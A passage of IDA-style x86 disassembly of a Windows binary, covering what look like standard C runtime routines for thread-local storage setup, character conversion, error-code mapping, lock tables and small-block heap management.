push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov off_427964, eax
call esi ; sub_446320
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov off_427968, eax
call esi ; sub_446320
push offset aFlsfree ; "FlsFree"
push edi
mov off_42796C, eax
call esi ; sub_446320
cmp off_427964, 0
mov esi, ds:dword_41D178
mov dword_427970, eax
jz short loc_405901
cmp off_427968, 0
jz short loc_405901
cmp off_42796C, 0
jz short loc_405901
test eax, eax
jnz short loc_405925
loc_405901: ; CODE XREF: sub_405886+63j
; sub_405886+6Cj ...
mov eax, ds:dword_41D180
mov off_427968, eax
mov eax, ds:off_41D174
mov off_427964, offset sub_4055A6
mov off_42796C, esi
mov dword_427970, eax
loc_405925: ; CODE XREF: sub_405886+79j
call ds:dword_41D17C ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_42368C, eax
jz loc_405A05
push off_427968
push eax
call esi ; TlsSetValue
test eax, eax
jz loc_405A05
call sub_407EC9
push off_427964
call sub_4054D7
push off_427968
mov off_427964, eax
call sub_4054D7
push off_42796C
mov off_427968, eax
call sub_4054D7
push dword_427970
mov off_42796C, eax
call sub_4054D7
add esp, 10h
mov dword_427970, eax
call sub_405C31
test eax, eax
jz short loc_405A00
push offset sub_405765
push off_427964
call sub_405543
pop ecx
call eax ; TlsGetValue
cmp eax, 0FFFFFFFFh
mov dword_423688, eax
jz short loc_405A00
push 214h
push 1
call sub_407B2A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405A00
push esi
push dword_423688
push off_42796C
call sub_405543
pop ecx
call eax ; TlsGetValue
test eax, eax
jz short loc_405A00
push 0
push esi
call sub_405616
pop ecx
pop ecx
call ds:dword_41D0DC ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_405A07
; ---------------------------------------------------------------------------
loc_405A00: ; CODE XREF: sub_405886+113j
; sub_405886+130j ...
call sub_4055D9
loc_405A05: ; CODE XREF: sub_405886+ADj
; sub_405886+BEj
xor eax, eax
loc_405A07: ; CODE XREF: sub_405886+178j
pop esi
pop edi
retn
sub_405886 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A0A proc near ; CODE XREF: sub_402BA2+9Bp
; sub_402BA2+ADp ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_18]
call sub_402AEB
mov ebx, [ebp+arg_0]
mov esi, 100h
cmp ebx, esi
jnb short loc_405A7D
mov ecx, [ebp+var_18]
cmp dword ptr [ecx+0ACh], 1
jle short loc_405A49
lea eax, [ebp+var_18]
push eax
push 1
push ebx
call sub_40CDF4
mov ecx, [ebp+var_18]
add esp, 0Ch
jmp short loc_405A56
; ---------------------------------------------------------------------------
loc_405A49: ; CODE XREF: sub_405A0A+29j
mov eax, [ecx+0C8h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 1
loc_405A56: ; CODE XREF: sub_405A0A+3Dj
test eax, eax
jz short loc_405A69
mov eax, [ecx+0CCh]
movzx eax, byte ptr [eax+ebx]
jmp loc_405B10
; ---------------------------------------------------------------------------
loc_405A69: ; CODE XREF: sub_405A0A+4Ej
; sub_405A0A+EAj
cmp [ebp+var_C], 0
jz short loc_405A76
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_405A76: ; CODE XREF: sub_405A0A+63j
mov eax, ebx
jmp loc_405B1D
; ---------------------------------------------------------------------------
loc_405A7D: ; CODE XREF: sub_405A0A+1Dj
mov eax, [ebp+var_18]
cmp dword ptr [eax+0ACh], 1
jle short loc_405ABA
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CDB0
test eax, eax
pop ecx
pop ecx
jz short loc_405ABA
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop ecx
jmp short loc_405ACF
; ---------------------------------------------------------------------------
loc_405ABA: ; CODE XREF: sub_405A0A+7Dj
; sub_405A0A+9Cj
call sub_405B83
mov dword ptr [eax], 2Ah
xor ecx, ecx
mov [ebp+var_4], bl
mov [ebp+var_3], 0
inc ecx
loc_405ACF: ; CODE XREF: sub_405A0A+AEj
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+4]
lea edx, [ebp+var_8]
push 3
push edx
push ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push dword ptr [eax+14h]
lea eax, [ebp+var_18]
push eax
call sub_40C6A9
add esp, 24h
test eax, eax
jz loc_405A69
cmp eax, 1
jnz short loc_405B05
movzx eax, [ebp+var_8]
jmp short loc_405B10
; ---------------------------------------------------------------------------
loc_405B05: ; CODE XREF: sub_405A0A+F3j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
loc_405B10: ; CODE XREF: sub_405A0A+5Aj
; sub_405A0A+F9j
cmp [ebp+var_C], 0
jz short loc_405B1D
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_405B1D: ; CODE XREF: sub_405A0A+6Ej
; sub_405A0A+10Aj
pop esi
pop ebx
leave
retn
sub_405A0A endp
; =============== S U B R O U T I N E =======================================
sub_405B21 proc near ; CODE XREF: sub_410C6D+19p
; sub_410C6D+36p
arg_0 = dword ptr 4
cmp dword_427940, 0
jnz short loc_405B3A
mov eax, [esp+arg_0]
lea ecx, [eax-41h]
cmp ecx, 19h
ja short locret_405B47
add eax, 20h
retn
; ---------------------------------------------------------------------------
loc_405B3A: ; CODE XREF: sub_405B21+7j
push 0
push [esp+4+arg_0]
call sub_405A0A
pop ecx
pop ecx
locret_405B47: ; CODE XREF: sub_405B21+13j
retn
sub_405B21 endp
; =============== S U B R O U T I N E =======================================
sub_405B48 proc near ; CODE XREF: sub_4039CF+80p
; sub_405BA9+Dp ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_405B4E: ; CODE XREF: sub_405B48+13j
cmp eax, dword_423690[ecx*8]
jz short loc_405B69
inc ecx
cmp ecx, 2Dh
jl short loc_405B4E
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_405B71
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_405B69: ; CODE XREF: sub_405B48+Dj
mov eax, dword_423694[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_405B71: ; CODE XREF: sub_405B48+1Bj
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_405B48 endp
; =============== S U B R O U T I N E =======================================
sub_405B83 proc near ; CODE XREF: sub_402BA2+19p
; sub_402BA2+4Fp ...
call sub_4056CA
test eax, eax
jnz short loc_405B92
mov eax, offset dword_4237F8
retn
; ---------------------------------------------------------------------------
loc_405B92: ; CODE XREF: sub_405B83+7j
add eax, 8
retn
sub_405B83 endp
; =============== S U B R O U T I N E =======================================
sub_405B96 proc near ; CODE XREF: sub_405BA9+1p
; sub_408E91+14p ...
call sub_4056CA
test eax, eax
jnz short loc_405BA5
mov eax, offset dword_4237FC
retn
; ---------------------------------------------------------------------------
loc_405BA5: ; CODE XREF: sub_405B96+7j
add eax, 0Ch
retn
sub_405B96 endp
; =============== S U B R O U T I N E =======================================
sub_405BA9 proc near ; CODE XREF: sub_408DFD+84p
; sub_40A15D+3FBp ...
arg_0 = dword ptr 4
push esi
call sub_405B96
mov ecx, [esp+4+arg_0]
push ecx
mov [eax], ecx
call sub_405B48
pop ecx
mov esi, eax
call sub_405B83
mov [eax], esi
pop esi
retn
sub_405BA9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BD0 proc near ; CODE XREF: sub_402CC5+9Ap
; sub_402DB5+42j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz short loc_405C2A
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_405BEC: ; CODE XREF: sub_405BD0+49j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_405C1B
or al, al
jz short loc_405C1B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_405C08
cmp ah, bl
ja short loc_405C08
add ah, dh
loc_405C08: ; CODE XREF: sub_405BD0+30j
; sub_405BD0+34j
cmp al, bh
jb short loc_405C12
cmp al, bl
ja short loc_405C12
add al, dh
loc_405C12: ; CODE XREF: sub_405BD0+3Aj
; sub_405BD0+3Ej
cmp ah, al
jnz short loc_405C21
sub ecx, 1
jnz short loc_405BEC
loc_405C1B: ; CODE XREF: sub_405BD0+22j
; sub_405BD0+26j
xor ecx, ecx
cmp ah, al
jz short loc_405C2A
loc_405C21: ; CODE XREF: sub_405BD0+44j
mov ecx, 0FFFFFFFFh
jb short loc_405C2A
neg ecx
loc_405C2A: ; CODE XREF: sub_405BD0+Bj
; sub_405BD0+4Fj ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_405BD0 endp
; =============== S U B R O U T I N E =======================================
sub_405C31 proc near ; CODE XREF: sub_405886+10Cp
push esi
push edi
xor esi, esi
mov edi, offset dword_427978
loc_405C3A: ; CODE XREF: sub_405C31+35j
cmp dword_423804[esi*8], 1
jnz short loc_405C62
lea eax, ds:423800h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_40CEC4
test eax, eax
pop ecx
pop ecx
jz short loc_405C6E
loc_405C62: ; CODE XREF: sub_405C31+11j
inc esi
cmp esi, 24h
jl short loc_405C3A
xor eax, eax
inc eax
loc_405C6B: ; CODE XREF: sub_405C31+47j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_405C6E: ; CODE XREF: sub_405C31+2Fj
and off_423800[esi*8], 0
xor eax, eax
jmp short loc_405C6B
sub_405C31 endp
; =============== S U B R O U T I N E =======================================
sub_405C7A proc near ; CODE XREF: sub_4055D9:loc_405611j
push ebx
mov ebx, ds:off_41D16C
push esi
mov esi, offset off_423800
push edi
loc_405C88: ; CODE XREF: sub_405C7A+30j
mov edi, [esi]
test edi, edi
jz short loc_405CA1
cmp dword ptr [esi+4], 1
jz short loc_405CA1
push edi
call ebx ; sub_450022
push edi
call sub_4039CF
and dword ptr [esi], 0
pop ecx
loc_405CA1: ; CODE XREF: sub_405C7A+12j
; sub_405C7A+18j
add esi, 8
cmp esi, offset dword_423920
jl short loc_405C88
mov esi, offset off_423800
pop edi
loc_405CB2: ; CODE XREF: sub_405C7A+50j
mov eax, [esi]
test eax, eax
jz short loc_405CC1
cmp dword ptr [esi+4], 1
jnz short loc_405CC1
push eax
call ebx ; sub_450022
loc_405CC1: ; CODE XREF: sub_405C7A+3Cj
; sub_405C7A+42j
add esi, 8
cmp esi, offset dword_423920
jl short loc_405CB2
pop esi
pop ebx
retn
sub_405C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CCF proc near ; CODE XREF: sub_402EAB+2p
; sub_403A25+2p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_423800[eax*8]
call ds:dword_41D168 ; RtlLeaveCriticalSection
pop ebp
retn
sub_405CCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405CE4 proc near ; CODE XREF: sub_405DA7+14p
; sub_408851+4Fp ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421818
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp dword_427AC8, ebx
jnz short loc_405D18
call sub_40A004
push 1Eh
call sub_409E64
push 0FFh
call sub_407C57
pop ecx
pop ecx
loc_405D18: ; CODE XREF: sub_405CE4+1Aj
mov esi, [ebp+arg_0]
lea esi, ds:423800h[esi*8]
cmp [esi], ebx
jz short loc_405D2A
mov eax, edi
jmp short loc_405D98
; ---------------------------------------------------------------------------
loc_405D2A: ; CODE XREF: sub_405CE4+40j
push 18h
call sub_407AEA
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_405D47
call sub_405B83
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_405D98
; ---------------------------------------------------------------------------
loc_405D47: ; CODE XREF: sub_405CE4+52j
push 0Ah
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_405D82
push 0FA0h
push edi
call sub_40CEC4
pop ecx
pop ecx
test eax, eax
jnz short loc_405D7E
push edi
call sub_4039CF
pop ecx
call sub_405B83
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_405D89
; ---------------------------------------------------------------------------
loc_405D7E: ; CODE XREF: sub_405CE4+81j
mov [esi], edi
jmp short loc_405D89
; ---------------------------------------------------------------------------
loc_405D82: ; CODE XREF: sub_405CE4+70j
push edi
call sub_4039CF
pop ecx
loc_405D89: ; CODE XREF: sub_405CE4+98j
; sub_405CE4+9Cj
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405D9E
mov eax, [ebp+var_1C]
loc_405D98: ; CODE XREF: sub_405CE4+44j
; sub_405CE4+61j
call __SEH_epilog4
retn
sub_405CE4 endp
; =============== S U B R O U T I N E =======================================
sub_405D9E proc near ; CODE XREF: sub_405CE4+ACp
; DATA XREF: fabskl8p:00421830o
push 0Ah
call sub_405CCF
pop ecx
retn
sub_405D9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DA7 proc near ; CODE XREF: sub_402E11+44p
; sub_4039CF+1Ep ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:423800h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_405DCD
push eax
call sub_405CE4
test eax, eax
pop ecx
jnz short loc_405DCD
push 11h
call sub_407C0D
pop ecx
loc_405DCD: ; CODE XREF: sub_405DA7+11j
; sub_405DA7+1Cj
push dword ptr [esi]
call ds:dword_41D164 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_405DA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DD8 proc near ; CODE XREF: sub_405E33:loc_405E56p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_407CB6
test eax, eax
pop ecx
jz short loc_405E01
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_405E01: ; CODE XREF: sub_405DD8+1Aj
lea eax, [ebp+var_8]
push eax
call sub_407CED
test eax, eax
pop ecx
jz short loc_405E1C
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_405E1C: ; CODE XREF: sub_405DD8+35j
cmp [ebp+var_4], 2
pop esi
jnz short loc_405E2E
cmp [ebp+var_8], 5
jb short loc_405E2E
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_405E2E: ; CODE XREF: sub_405DD8+49j
; sub_405DD8+4Fj
push 3
pop eax
leave
retn
sub_405DD8 endp
; =============== S U B R O U T I N E =======================================
sub_405E33 proc near ; CODE XREF: sub_4044D2-10Fp
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41D15C ; HeapCreate
test eax, eax
mov dword_427AC8, eax
jnz short loc_405E56
loc_405E53: ; CODE XREF: sub_405E33+54j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405E56: ; CODE XREF: sub_405E33+1Ej
call sub_405DD8
cmp eax, 3
mov dword_436974, eax
jnz short loc_405E89
push 3F8h
call sub_405E8D
test eax, eax
pop ecx
jnz short loc_405E89
push dword_427AC8
call ds:off_41D160
and dword_427AC8, 0
jmp short loc_405E53
; ---------------------------------------------------------------------------
loc_405E89: ; CODE XREF: sub_405E33+30j
; sub_405E33+3Fj
xor eax, eax
inc eax
retn
sub_405E33 endp
; =============== S U B R O U T I N E =======================================
sub_405E8D proc near ; CODE XREF: sub_405E33+37p
arg_0 = dword ptr 4
push 140h
push 0
push dword_427AC8
call ds:dword_41D110 ; RtlAllocateHeap
test eax, eax
mov dword_436960, eax
jnz short loc_405EAA
retn
; ---------------------------------------------------------------------------
loc_405EAA: ; CODE XREF: sub_405E8D+1Aj
mov ecx, [esp+arg_0]
and dword_427ACC, 0
and dword_43695C, 0
mov dword_436968, eax
xor eax, eax
mov dword_436964, ecx
mov dword_43696C, 10h
inc eax
retn
sub_405E8D endp
; =============== S U B R O U T I N E =======================================
sub_405ED5 proc near ; CODE XREF: sub_402E11+4Ep
; sub_4039CF+29p ...
arg_0 = dword ptr 4
mov ecx, dword_43695C
mov eax, dword_436960
imul ecx, 14h
add ecx, eax
jmp short loc_405EF9
; ---------------------------------------------------------------------------
loc_405EE7: ; CODE XREF: sub_405ED5+26j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_405EFF
add eax, 14h
loc_405EF9: ; CODE XREF: sub_405ED5+10j
cmp eax, ecx
jb short loc_405EE7
xor eax, eax
locret_405EFF: ; CODE XREF: sub_405ED5+1Fj
retn
sub_405ED5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F00 proc near ; CODE XREF: sub_4039CF+38p
; sub_40DE1D+B5p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_406210
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_405FCB
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405F63
push 3Fh
pop edx
loc_405F63: ; CODE XREF: sub_405F00+5Ej
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405FAD
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_405F8E
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_405FAA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_405FAA
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F00+73j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_405FAA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_405FAA: ; CODE XREF: sub_405F00+85j
; sub_405F00+8Cj ...
mov ebx, [ebp+arg_4]
loc_405FAD: ; CODE XREF: sub_405F00+69j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_405FCB: ; CODE XREF: sub_405F00+55j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405FD9
push 3Fh
pop edx
loc_405FD9: ; CODE XREF: sub_405F00+D4j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_406077
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_405FFE
mov ebx, esi
loc_405FFE: ; CODE XREF: sub_405F00+FAj
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_406010
mov edx, esi
loc_406010: ; CODE XREF: sub_405F00+10Cj
cmp ebx, edx
jz short loc_406072
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_40605A
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_406040
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_40605A
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_40605A
; ---------------------------------------------------------------------------
loc_406040: ; CODE XREF: sub_405F00+127j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_40605A
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_40605A: ; CODE XREF: sub_405F00+11Dj
; sub_405F00+137j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_406072: ; CODE XREF: sub_405F00+112j
mov esi, [ebp+arg_4]
jmp short loc_40607A
; ---------------------------------------------------------------------------
loc_406077: ; CODE XREF: sub_405F00+E2j
mov ebx, [ebp+arg_0]
loc_40607A: ; CODE XREF: sub_405F00+175j
cmp [ebp+var_C], 0
jnz short loc_406088
cmp ebx, edx
jz loc_406108
loc_406088: ; CODE XREF: sub_405F00+17Ej
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_406108
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_4060DF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4060CE
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4060CE: ; CODE XREF: sub_405F00+1BEj
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_406108
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_405F00+1B8j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4060F5
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4060F5: ; CODE XREF: sub_405F00+1E3j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_406108: ; CODE XREF: sub_405F00+182j
; sub_405F00+1A6j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_40620F
mov eax, dword_427ACC
test eax, eax
jz loc_406201
mov ecx, dword_436970
mov esi, ds:off_41D158
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; sub_43ED59
mov ecx, dword_436970
mov eax, dword_427ACC
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_427ACC
mov eax, [eax+10h]
mov ecx, dword_436970
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_427ACC
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_427ACC
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_406196
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_427ACC
loc_406196: ; CODE XREF: sub_405F00+28Bj
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_406201
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; sub_43ED59
mov eax, dword_427ACC
push dword ptr [eax+10h]
push 0
push dword_427AC8
call ds:dword_41D108 ; RtlFreeHeap
mov ecx, dword_43695C
mov eax, dword_427ACC
imul ecx, 14h
mov edx, dword_436960
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_407720
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_43695C
cmp eax, dword_427ACC
jbe short loc_4061F7
sub [ebp+arg_0], 14h
loc_4061F7: ; CODE XREF: sub_405F00+2F1j
mov eax, dword_436960
mov dword_436968, eax
loc_406201: ; CODE XREF: sub_405F00+223j
; sub_405F00+29Aj
mov eax, [ebp+arg_0]
mov dword_427ACC, eax
mov dword_436970, edi
loc_40620F: ; CODE XREF: sub_405F00+216j
pop ebx
loc_406210: ; CODE XREF: sub_405F00+37j
pop edi
pop esi
leave
retn
sub_405F00 endp
; =============== S U B R O U T I N E =======================================
sub_406214 proc near ; CODE XREF: sub_4066A9+C0p
mov eax, dword_43696C
push esi
mov esi, dword_43695C
push edi
xor edi, edi
cmp esi, eax
jnz short loc_40625B
add eax, 10h
imul eax, 14h
push eax
push dword_436960
push edi
push dword_427AC8
call ds:off_41D150
cmp eax, edi
jnz short loc_406249
loc_406245: ; CODE XREF: sub_406214+68j
; sub_406214+94j
xor eax, eax
jmp short loc_4062C1
; ---------------------------------------------------------------------------
loc_406249: ; CODE XREF: sub_406214+2Fj
add dword_43696C, 10h
mov esi, dword_43695C
mov dword_436960, eax
loc_40625B: ; CODE XREF: sub_406214+11j
imul esi, 14h
add esi, dword_436960
push 41C4h
push 8
push dword_427AC8
call ds:dword_41D110 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_406245
push 4
push 2000h
push 100000h
push edi
call ds:off_41D154
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4062AA
push dword ptr [esi+10h]
push edi
push dword_427AC8
call ds:dword_41D108 ; RtlFreeHeap
jmp short loc_406245
; ---------------------------------------------------------------------------
loc_4062AA: ; CODE XREF: sub_406214+82j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_43695C
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_4062C1: ; CODE XREF: sub_406214+33j
pop edi
pop esi
retn
sub_406214 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062C4 proc near ; CODE XREF: sub_4066A9+D6p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_4062DC
; ---------------------------------------------------------------------------
loc_4062D9: ; CODE XREF: sub_4062C4+1Aj
add eax, eax
inc ebx
loc_4062DC: ; CODE XREF: sub_4062C4+13j
test eax, eax
jge short loc_4062D9
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_4062F5: ; CODE XREF: sub_4062C4+3Bj
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4062F5
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:off_41D154
test eax, eax
jnz short loc_406328
or eax, 0FFFFFFFFh
jmp loc_4063C5
; ---------------------------------------------------------------------------
loc_406328: ; CODE XREF: sub_4062C4+5Aj
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_406378
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_406340: ; CODE XREF: sub_4062C4+AFj
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_406340
mov edx, [ebp+var_4]
loc_406378: ; CODE XREF: sub_4062C4+6Fj
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4063B5
or [eax+4], edi
loc_4063B5: ; CODE XREF: sub_4062C4+ECj
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
